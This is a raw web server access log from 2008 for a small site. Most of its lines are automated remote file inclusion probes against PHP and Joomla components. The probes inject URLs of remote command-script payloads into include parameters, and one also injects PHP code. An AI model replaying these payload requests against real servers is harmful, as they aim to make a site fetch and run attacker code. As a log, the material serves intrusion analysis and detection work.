67.15.48.60 - - [25/May/2008:17:01:10 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
67.15.48.60 - - [25/May/2008:17:01:10 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
67.15.48.60 - - [25/May/2008:17:01:10 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
67.15.48.60 - - [25/May/2008:17:01:10 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
209.163.169.99 - - [25/May/2008:17:02:55 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
209.163.169.99 - - [25/May/2008:17:02:55 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.72.119.227 - - [25/May/2008:17:07:29 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.72.119.227 - - [25/May/2008:17:07:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
125.247.159.130 - - [25/May/2008:17:10:32 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.146.59.231 - - [25/May/2008:17:12:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.146.59.231 - - [25/May/2008:17:12:36 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.17.3.183 - - [25/May/2008:17:12:56 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.6.17.252 - - [25/May/2008:17:18:36 -0700] "GET /tmp/?N=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:17:31:10 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
201.12.151.34 - - [25/May/2008:17:31:11 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/DnL/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.mathstamps.com"
69.0.211.58 - - [25/May/2008:17:35:19 -0700] "GET /logs//_blogadata/include/struct_main2.php?incl_page=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
69.0.211.58 - - [25/May/2008:17:35:19 -0700] "GET //_blogadata/include/struct_main2.php?incl_page=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:41:01 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:41:10 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:41:18 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.36.252.34 - - [25/May/2008:17:41:38 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:42:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:42:24 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:42:25 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:49:19 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:17:49:28 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.17.244 - - [25/May/2008:17:53:32 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.52.87 - - [25/May/2008:17:53:50 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.52.117 - - [25/May/2008:17:55:09 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
67.195.54.37 - - [25/May/2008:17:59:28 -0700] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:18:15:00 -0700] "GET /logs//appserv/mainhttp://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
193.111.11.7 - - [25/May/2008:18:15:07 -0700] "GET //appserv/mainhttp://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:18:17:41 -0700] "GET /logs//include.php?path[docroot]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:18:17:41 -0700] "GET //include.php?path[docroot]=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:18:18:38 -0700] "GET /newsletter/newsletter.php?waroot=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.78.216.197 - - [25/May/2008:18:18:38 -0700] "GET /logs/newsletter/newsletter.php?waroot=http://www.geocities.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
65.36.252.34 - - [25/May/2008:18:27:19 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.67.23.140 - - [25/May/2008:18:29:59 -0700] "GET /logs/access.log/joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.23.140 - - [25/May/2008:18:29:59 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.23.140 - - [25/May/2008:18:29:59 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
80.67.23.140 - - [25/May/2008:18:29:59 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
163.28.32.100 - - [25/May/2008:18:33:50 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
163.28.32.100 - - [25/May/2008:18:33:50 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://scaneru.nm.ru/idv.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
65.36.252.34 - - [25/May/2008:18:34:04 -0700] "GET /logs/access_080331.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
85.17.3.183 - - [25/May/2008:18:39:55 -0700] "GET //ashnews.php?pathtoashnews=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:18:55:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:01:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:01:53 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:01:54 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:01:54 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://dj.caucasus.net/id11.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:02:24 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:02:24 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:02:25 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:02:26 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:02:26 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://singspiration.org//id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:19:04:23 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:19:04:23 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:19:04:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.247.230.27 - - [25/May/2008:19:07:59 -0700] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mildnet-scan.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
80.247.230.27 - - [25/May/2008:19:08:02 -0700] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://mildnet-scan.sitesled.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:19:08:23 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.7.108.240 - - [25/May/2008:19:08:23 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
209.62.80.134 - - [25/May/2008:19:08:44 -0700] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.mathstamps.com"
209.62.80.134 - - [25/May/2008:19:08:44 -0700] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:09:07 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:09:07 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:09:08 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:19:10:16 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
216.167.156.20 - - [25/May/2008:19:10:16 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:19:11:00 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.163.140.46 - - [25/May/2008:19:11:01 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.75.35.118 - - [25/May/2008:19:12:00 -0700] "GET /logs/access_080428.log//faqsupport/samplefaqsupport.php?path[docroot]=http://pigsofwar.com/images/banners/inc.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:15:05 -0700] "GET /logs/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:15:06 -0700] "GET /mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:20 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.97.84 - - [25/May/2008:19:15:24 -0700] "GET /logs//mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
92.48.97.84 - - [25/May/2008:19:15:24 -0700] "GET //mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:24 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:15:25 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:16:44 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:16:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:19:16:58 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.58.181.74 - - [25/May/2008:19:16:59 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:19:17:07 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
160.99.12.231 - - [25/May/2008:19:17:08 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.195.37.92 - - [25/May/2008:19:18:40 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:18:42 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:18:43 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://kiliclub.com/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
67.195.37.92 - - [25/May/2008:19:19:01 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:19:06 -0700] "GET /logs/access_080421.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
195.54.9.218 - - [25/May/2008:19:19:07 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:19:24:13 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.188.60.54 - - [25/May/2008:19:24:13 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
70.84.192.18 - - [25/May/2008:19:25:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.55.53.226 - - [25/May/2008:19:28:04 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.55.53.226 - - [25/May/2008:19:28:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:28:28 -0700] "GET /logs/access_080218.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
75.125.252.82 - - [25/May/2008:19:28:28 -0700] "GET /logs/access_080310.log/mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
92.48.97.84 - - [25/May/2008:19:29:02 -0700] "GET /logs/access_080218.log//mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:29:02 -0700] "GET /logs/access_080428.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
92.48.97.84 - - [25/May/2008:19:29:02 -0700] "GET /logs/access_080310.log//mambots/content/multithumb/thickbox/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.167.19.30 - - [25/May/2008:19:29:02 -0700] "GET /logs/access_080428.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://geocities.com/zorro_patah_hati/maros.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:19:30:24 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.160.203.190 - - [25/May/2008:19:30:24 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
